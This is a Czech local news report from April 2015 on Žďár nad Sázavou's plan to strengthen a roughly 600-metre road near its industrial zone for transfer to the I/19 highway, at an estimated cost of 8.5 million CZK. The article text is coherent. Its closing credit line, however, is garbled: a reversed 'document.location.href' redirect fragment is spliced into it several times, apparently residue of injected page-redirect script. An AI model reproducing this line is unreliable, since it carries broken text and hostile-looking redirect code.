Rainbow page separator

Žďár připravuje přestavbu silnice kolem průmyslové zóny

Pondělí, 6. dubna 2015

Žďár nad Sázavou / Příslušná správní povolení a podklady pro výběrové řízení na dodavatele stavby v současné době vyřizuje žďárská radnice v souvislosti se zvýšením únosnosti komunikace mezi ulicemi Jamská a Brněnská. Ta se pak stane součástí silnice I/19, jejíž přeložku mezi ulicí Jamská a křižovatkou u Mělkovic začalo v minulých dnech ve své režii budovat Ředitelství silnic a dálnic (ŘSD) ČR.
Úsek, jehož zpevnění bude financovat Žďár, měří více než šest set metrů, jedná se o komunikaci od kruhové křižovatky v ulici Brněnská před sjezd u regulační plynové stanice. Silnice se zvýšenou únosností bude poté předána ŘSD ČR a vedena jako komunikace I/19, přičemž žďárská radnice naopak získá do svého majetku celou silnici v Novoměstské ulici.
„Dodavatelé obou staveb budou koordinováni a postup stavby zajišťované městem bude směřovat ke společnému termínu uvedení stavby do provozu,“ uvedla mluvčí žďárské radnice Nikola Adlerová s tím, že předpokládané náklady na zvýšení únosnosti silnice činí 8,5 milionu korun bez DPH.

Fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to: [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to.com/“ target=“_blank“>www.dajc-naturepho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to.com